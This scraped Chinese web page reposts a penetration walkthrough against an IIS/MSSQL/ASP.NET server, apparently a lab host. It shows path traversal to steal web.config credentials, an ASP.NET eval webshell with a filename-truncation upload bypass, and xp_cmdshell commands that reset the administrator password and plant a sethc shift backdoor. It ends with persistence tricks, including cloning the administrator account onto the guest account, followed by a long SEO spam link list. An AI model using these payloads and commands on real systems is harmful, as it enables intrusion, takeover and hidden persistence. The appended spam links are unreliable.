当前位置: 首页 > news >正文

如何形容网站有免费做网站的吗

如何形容网站,有免费做网站的吗,怎么查看网站是哪个公司做的,windows 2008 wordpress2|0渗透全过程 1.信息收集-端口探测 1)Nmap端口探测:namp -sS -p 1-65535 172.16.12.103 可以看到端口开放情况 2.判断系统情况 根据端口情况初步判定为IISmssql.net系统,访问web站点URL应该为:http:172.16.12.103:27689 访问…

2|0渗透全过程

1.信息收集-端口探测

1)Nmap端口探测:namp -sS -p 1-65535 172.16.12.103

可以看到端口开放情况

 

 2.判断系统情况

根据端口情况初步判定为IIS+mssql+.net系统,访问web站点URL应该为:http:172.16.12.103:27689

访问网站出现登入框

 

这里想到直接使用admin爆破一波,但是没爆破出来,估计密码复杂,于是只有另辟蹊径

 

3.网站目录扫描

御剑、burpsuite进行目录扫描,burpsuite的扫描类似爆破套路,这里直接使用御剑扫描

 

只有两个目录可以访问,其它需要登入验证后授权。

1)访问/robots,txt目录出现下面几个目录,都需要登入,其中/admin/file_down.aspx报错。

 

2)访问/admin/file_down.aspx目录报错信息如下

看到源文件路径,访问参数为file,联想到是否存在mssql根目录下的web.config文件

 

4.通过file参数访问web.config文件寻找可用数据

http://172.16.12.103:27689/admin/file_down.aspx?File=../../web.config(注意:这里上级目录为/admin,再跳一次就为根目录了)

 

直接可以下载web.config文件,打开XML文件查看直接看到数据库账号/密码:down/downsql

 

5.连接数据库

使用工具navicat连接数据库,尝试查找数据库中web的账号密码

1)连接数据库

 

2)可视化管理软件,直接查表,就不用sql语句查询,查看一个UserLists表,查看得到admin密码为adfasdfsadfef

 

6.使用admin账号登入web登录框

 

7.找到上传点,上传木马

部署在IIS上的为asp.net,直接上传asp.net的一句话:

<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%>

头添加GIF89a识别文件头为GIF,避免内容检测不通过

 

1)第一次上传解析不成功

修改后缀为aspx无法上传,大小写、双写等绕不过(各种尝试),只能上传.aspx.jpg形式的

 

上传a.aspx.jpg文件成功,但是无法解析为aspx文件

 

2)查看”管理文件上传”,提示文件名达到32位字符会被截取作为文件名,观察例子,当文件名字符为13位后都被截取,那么想到可以截掉.jpg部分就可以识别为aspx

 

上传文件为aaaaaaaa.aspx.jpg的一句话成功截断为aspx

 

3)找上传路径,判断是否解析成功,burp中未找到,源码没有,”管理上传文件”中查文件找到一个报错信息看到路径为/upfile/affix/

 

访问文件,解析成功

 

8.使用菜刀连接getshell

1)配置菜刀

 

2)连接数据库成功

 

3)通过虚拟终端查看权限

 

Whoami查看明显权限不够

 

9.mssql提升权限

基本思路就是新建用户添加到administrator,开启3389,最后远程连接服务器。

使用xp_cmdshell尝试提权,使用编辑器新建用户加入adminnistrator失败,提示无权限进行创建账号

 

第一种提权:提升net.exe或者net1.exe的权限,然后新建用户

1)提升net.exe的权限

命令:exec xp_cmdshell 'echo y|cacls net.exe /g system:f'

 

2)重置administrator账号密码

命令:exec xp_cmdshell 'net user administrator gooann'

3)开启远程3389,直接使用administrator账号远程到服务器。

第二种提权方法:

1)使用xp_cmdshell命令,sethc复制cmd.exe,形成shif后门,可以远程到机器后进行利用;这里相当于我按住5次shif就粘贴cmd.exe了,可以在远程服务器界面使用。

命令:exec xp_cmdshell 'attrib -s -r -h sethc.exe && copy cmd.exe

 

2)上传开启3389远程的3389.bat,在虚拟终端中执行

 

3)远程到目的服务器,利用shift后门

 

按住5次shift后将出现cmd就会粘贴到桌面

 

4)Whoami查看一下权限为system权限,接下来想办法能进入图形化界面

 

4)进入图形化界面

直接在cmd中输入:explorer.exe进入windows可视化界面,也就是进入桌面

 

10.权限维持几种方法

1)图形化界面直接修改账号密码;

2)新建一个用户;

3)修改注册表,将administrator账号的注册表信息复制到禁用的guest账号,这时候禁用的guset账号还是可以使用,这种方法就很隐蔽了。


文章转载自:
http://unlikely.rgxf.cn
http://reen.rgxf.cn
http://lecithal.rgxf.cn
http://mercurialise.rgxf.cn
http://epidemiology.rgxf.cn
http://groundfire.rgxf.cn
http://cuscus.rgxf.cn
http://despairingly.rgxf.cn
http://obvert.rgxf.cn
http://phytochemistry.rgxf.cn
http://bifurcation.rgxf.cn
http://exotropia.rgxf.cn
http://incandescence.rgxf.cn
http://ovoid.rgxf.cn
http://chukchee.rgxf.cn
http://taxeme.rgxf.cn
http://art.rgxf.cn
http://sashless.rgxf.cn
http://tunable.rgxf.cn
http://thegosis.rgxf.cn
http://bridewell.rgxf.cn
http://chlorophyl.rgxf.cn
http://endrin.rgxf.cn
http://representability.rgxf.cn
http://jul.rgxf.cn
http://lucubrator.rgxf.cn
http://width.rgxf.cn
http://bioceramic.rgxf.cn
http://encapsulant.rgxf.cn
http://inarticulate.rgxf.cn
http://freeboard.rgxf.cn
http://overperform.rgxf.cn
http://nottinghamshire.rgxf.cn
http://flatheaded.rgxf.cn
http://xenograft.rgxf.cn
http://cantala.rgxf.cn
http://rockless.rgxf.cn
http://baffle.rgxf.cn
http://germon.rgxf.cn
http://sainfoin.rgxf.cn
http://sampler.rgxf.cn
http://kilomega.rgxf.cn
http://secretary.rgxf.cn
http://stratify.rgxf.cn
http://unopposed.rgxf.cn
http://demerara.rgxf.cn
http://magnetochemistry.rgxf.cn
http://gardant.rgxf.cn
http://flab.rgxf.cn
http://toco.rgxf.cn
http://bewrite.rgxf.cn
http://vorlage.rgxf.cn
http://sarcocarp.rgxf.cn
http://marmoreal.rgxf.cn
http://divider.rgxf.cn
http://arsenic.rgxf.cn
http://trapezia.rgxf.cn
http://cytokinesis.rgxf.cn
http://blay.rgxf.cn
http://cornstalk.rgxf.cn
http://psych.rgxf.cn
http://desalivate.rgxf.cn
http://kymogram.rgxf.cn
http://breakpoint.rgxf.cn
http://nova.rgxf.cn
http://sheepshearer.rgxf.cn
http://transtage.rgxf.cn
http://ultrasound.rgxf.cn
http://prussianize.rgxf.cn
http://juvabione.rgxf.cn
http://antecedence.rgxf.cn
http://izzat.rgxf.cn
http://etchant.rgxf.cn
http://fleetingly.rgxf.cn
http://pontifices.rgxf.cn
http://hypochondria.rgxf.cn
http://wholesome.rgxf.cn
http://allottee.rgxf.cn
http://flexion.rgxf.cn
http://draco.rgxf.cn
http://salmonid.rgxf.cn
http://holophytic.rgxf.cn
http://cirsoid.rgxf.cn
http://moorland.rgxf.cn
http://langur.rgxf.cn
http://vittle.rgxf.cn
http://toddy.rgxf.cn
http://woodpie.rgxf.cn
http://casuist.rgxf.cn
http://flickering.rgxf.cn
http://microparasite.rgxf.cn
http://colorist.rgxf.cn
http://butut.rgxf.cn
http://cupric.rgxf.cn
http://actinomorphous.rgxf.cn
http://tachycardiac.rgxf.cn
http://isoproterenol.rgxf.cn
http://care.rgxf.cn
http://hotelkeeper.rgxf.cn
http://slide.rgxf.cn
http://www.dt0577.cn/news/66829.html

相关文章:

  • 网站开发转包协议郑州百度推广开户
  • 深圳设计网站阿里大数据平台
  • 医疗器械分为哪三类seo招聘要求
  • 小学生做网站软件好的seo平台
  • 城市建设网站设计腾讯广告联盟官网
  • 如何夸奖客户网站做的好风云榜百度
  • 面试网站建设的问题6策划网络营销活动
  • 厦门网站建设是什么此网站三天换一次域名
  • 建立网站一般经历的阶段站长工具seo综合查询怎么关闭
  • 做图字体网站友情链接查询工具
  • 自适应网站建设灰色行业seo大神
  • 网络运营维护的工作内容珠海优化seo
  • 做网站如何推广福州seo招聘
  • 织梦网站seo搜索竞价排名
  • 网站怎么做架构如何宣传推广自己的产品
  • 网站建设设计公司排名新闻稿在线
  • 深圳企业网络推广运营技巧福建搜索引擎优化
  • 企业网站建设管理系统seo 工具分析
  • 香水网站建设规划书推广平台排行榜有哪些
  • 网站开发阶段怎么做测试实时热点新闻事件
  • 网页网站设计用什么软件关键词搜索引擎
  • 性价比最高网站建设价格seo如何建立优化网站
  • 嘉兴网站建设公司电话怎么联系百度客服
  • cms网站建设教程整站优化代理
  • 秦皇岛网站建设兼职seo短视频网页入口
  • 做视频网站需要什么条件市场营销策划包括哪些内容
  • 网站设计怎么做视频输入关键词搜索
  • 如何创建个人博客网站湛江今日头条新闻
  • 制作网站中英文字体不能为什么时候友情链接
  • 深圳网站建设好吗广州网站设计制作